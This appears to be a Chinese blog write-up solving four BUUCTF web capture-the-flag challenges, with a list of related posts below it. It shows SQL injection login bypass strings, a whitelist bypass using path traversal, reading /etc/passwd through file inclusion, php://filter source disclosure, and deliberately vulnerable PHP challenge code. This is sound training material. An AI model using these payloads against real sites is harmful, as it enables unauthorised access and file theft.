BUUCTF-EasySQL、WarmUp、Havefun、Include

原创 已于 2022-06-13 17:30:17 修改 · 638 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-06-07 16:52:33 首次发布
本文分享了解析和利用多个CTF挑战中的漏洞过程,包括EasySQL的文件权限突破,WarmUp的白名单绕过,Hint.txt的发现,Havefun的逻辑谜题,以及ACTF2020 Include中的PHP伪协议利用。通过这些实例,展示了如何一步步找到flag并利用文件包含漏洞获取关键信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

[极客大挑战 2019]EasySQL

[HCTF 2018]WarmUp

[极客大挑战 2019]Havefun

[ACTF2020 新生赛]Include

[极客大挑战 2019]EasySQL

打开靶机

直接尝试万能密码,账号admin' or 1=1#,密码随意

[HCTF 2018]WarmUp

 打开靶机,里面有一个大大的表情包

 按f12查看源码,发现了source.php

 直接url进行访问得到了php代码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)//定义了一个checkFire函数
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单
            if (! isset($page) || !is_string($page)) {//判断是否是字符类型
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')//截取问号前的字符串
            );
            if (in_array($_page, $whitelist)) {//判断是不是在白名单上
                return true;
            }

            $_page = urldecode($page);//如果不成立则执行该代码块
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')//对'?'二次url解码
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])//检查变量是不是空的
        && is_string($_REQUEST['file'])//判断是不是字符串
        && emmm::checkFile($_REQUEST['file'])//调用checkFire函数
    ) {
        include $_REQUEST['file'];//这里有个文件
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

在这段代码中发现了hint.txt,仍然是url进行访问查看

 

发现flag在ffffllllaaaagggg中 

构造payload source.php?file=hint.php?ffffllllaaaagggg

 发现表情没了,说明payload是正确的

但是不知道目录,所以用../来返回查看当返回到第五个的时候发现flag

[极客大挑战 2019]Havefun

打开靶机有一只懒惰的猫,查看网页源码发现php

 大概意思就是get值使得cat=dog

[ACTF2020 新生赛]Include

文件包含漏洞详解_源十三的博客-优快云博客_包含漏洞

打开靶机,发现里面有tips 

点击进去有

 

 打开一个新的网页的同时发现?file=flag.php

 输入?file=/etc/passwd,发现有返回值,确定有文件包含漏洞

但是并没有什么实质性的信息,flag在哪也不知道。所以用文件包含漏洞中的php://filter/convert.base64-encode/resource伪协议来返回已知页面的代码。构造payload:?file=php://filter/convert.base64-encode/resource=index.php就可以得到index.php的源代码的base64密文

Base64 在线编码解码 | Base64 加密解密 - Base64.us

解密可得

<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>
大概意思就是它过滤了几个php伪协议,但是没有过滤现在这个
我们直接看一下flag.php的内容

构造payload:?file=php://filter/convert.base64-encode/resource=flag.php得到flag的base64密文

 Base64 在线编码解码 | Base64 加密解密 - Base64.us

CTF学习笔记——Havefun&easy_tornado
Obs_cure的博客
08-23 1305
一、[极客大挑战 2019]Havefun 1.题目 2.解题步骤 虽然作为一个php废物,但是看到下面注释里写的明显是要提交一个get变量,而且很明显有一个dog的提示,就尝试输入一下: 成功爆出flag。 3.总结 这是第一次自己不看writeup做出来的web题,泪目。回头看了一些writeup发现这道题在给cat变量赋值的时候会显示出来,如果赋dog会出flag,但是输入其他值并没有回显,不清楚为什么。 二、[护网杯 2018]easy_tornado 1.题目 题目界面是三个文件夹,依次进入
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2619
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 1万+
SQL注入。
BUUCTF在线评测-练习场-WebCTF习题[极客大挑战 2019]Havefun1-flag获取、解析
最新发布
m0_56970656的博客
06-10 196
此题较为简单,查看源码进行,代码审计即可。
BUUCTFWebEasySQL
qq_70434663的博客
02-28 1265
如果我们传入的username为1' or 1=1 #,随便输入password。既然知道了是单引号闭合,现在就尝试注入,首先了解一下万能用户名和密码。会用到以下的句型,如果用户与密码匹配正确则返回真值通过验证成功登录。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。所以尝试闭合方法,随便输入1、1'、1''密码随便输入即可。但输入1'时会报错,所以语句为单引号闭合。当输入1和1''时会出现以下的提示,××,××,××为两张表查询字段的数量。一般的,库验证登录注册。
BUUCTF [极客大挑战 2019]EasySQL 1
YueXuan_521的博客
05-07 805
BUUCTF [极客大挑战 2019]EasySQL 1 没想到这道题这么简单,仅仅判断注入点flag就出来了,连sqlmap都没用。提交数据出现在URL中,确定为GET提交方式。如果结果返回了全部的内容,可以判断存在注入点。[极客大挑战 2019]EasySQL 1。出现语法错误提示,确定为字符型注入。首先,判断提交方式,随机输入数据。
BUUCTFEasySQL [SUCTF 2019]
金 帛的博客
04-18 3193
BUUCTF的WP
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1406
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF - Web - 1
weixin_39505091的博客
07-20 849
堆叠注入是一种SQL注入技术,允许攻击者在单个SQL查询中执行多个语句。此时可以采用改表名的方式来查询,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦。查看另一个表的表结构,发现有 id 和 data 字段,猜想我们当前查询就是在这个表下进行的。发现过滤了很多字符,flag 字符串也被过滤了。其他命令的注入难免需要输入空格,需要尝试绕过空格。尝试注入,发现空格会被拦截,使用;
BUUCTF-WEB
ccfly1012的博客
11-02 4148
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 891
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
一道CTF----BUUCTF---练习场---Havefun
qq_51550750的博客
01-14 1291
一道CTF 页面什么都没有显示,右键,查看页面源代码: (文章最后是源码,其实有用的只有 最后的背注释的PHP代码,源码附在本文章最后) 根据要求: http://cd4e7bd2-d9da-414f-beb4-56b66ba1a165.node4.buuoj.cn:81/?cat=dog 执行就得到flag: <!doctype html> <html> <head> <meta charset="utf-8"> <title&gt
buuctf(入门) Have Fun
qq_64501184的博客
11-27 604
havefun
buuctf have fun
yedizhende6的博客
11-28 361
buuctf have fun
BUUCTF:[极客大挑战 2019]Havefun
末初 · mochu7
10-06 1201
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Havefun 页面源代码中发现提示 尝试对$cat传参发现并没有echo回显,当传一个?cat=dog时也并没有回显Syc{cat_cat_cat_cat}而是直接回显了flag ?cat=dog ...
HavefunBuuctf)题解
2503_92002725的博客
05-10 168
可以传以下cat的参数,当cat的值是dog时,就会输入一些内容。cat=dog,然后就出现flag了。打开之后界面就是这样,没有数据交互的地方,查看一下源代码。翻一下源代码,发现这么几行代码。
BUUctf-WEB-Havefun
qq_63301612的博客
11-29 713
BUUctf-WEB-Havefun的简单教程
CTF学习第十一站——BUUCTF[极客大挑战 2019]Havefun1
qq_41174589的博客
10-09 303
好的,我们只看到了一只猫晃着它的尾巴让人非常想撸但又没办法。我们试一试在URL后加上cat=dog,得到flag。这时我们先抓个包并发到重放器,结果如下。略过一堆写猫尾巴的代码,我们发现了这个。
buuctf里的[极客大挑战 2019]Havefun
qq_51439282的博客
12-06 427
[极客大挑战 2019]Havefun 看着标题Havefun,找快乐,这道题也是真的快乐。 打开可以看到这只猫,点了点它也没啥反应,发现它的尾巴会跟随鼠标的动而动,一开始我以为这里面暗藏什么玄机,没想到啊,弄了半天啥也没发现,既然这样直接F12,查看源代码很明显可以发现这里有个get传参当猫等于狗时,就会有什么。。。 那就试试呗,看能有啥东西出来 就这样构造好之后(注意要在英文状态输入)回车可以发现,flag出来啦 ...
buuctf warmup
01-13
### BUUCTF Warmup 题目解决方案 在处理BUUCTF平台上的Warmup题目时,通常这些题目旨在帮助参赛者熟悉比赛环境和基本技巧。对于warmup_csaw_2016这类涉及栈溢出覆盖返回地址的题目[^3],解决方法主要依赖于理解程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值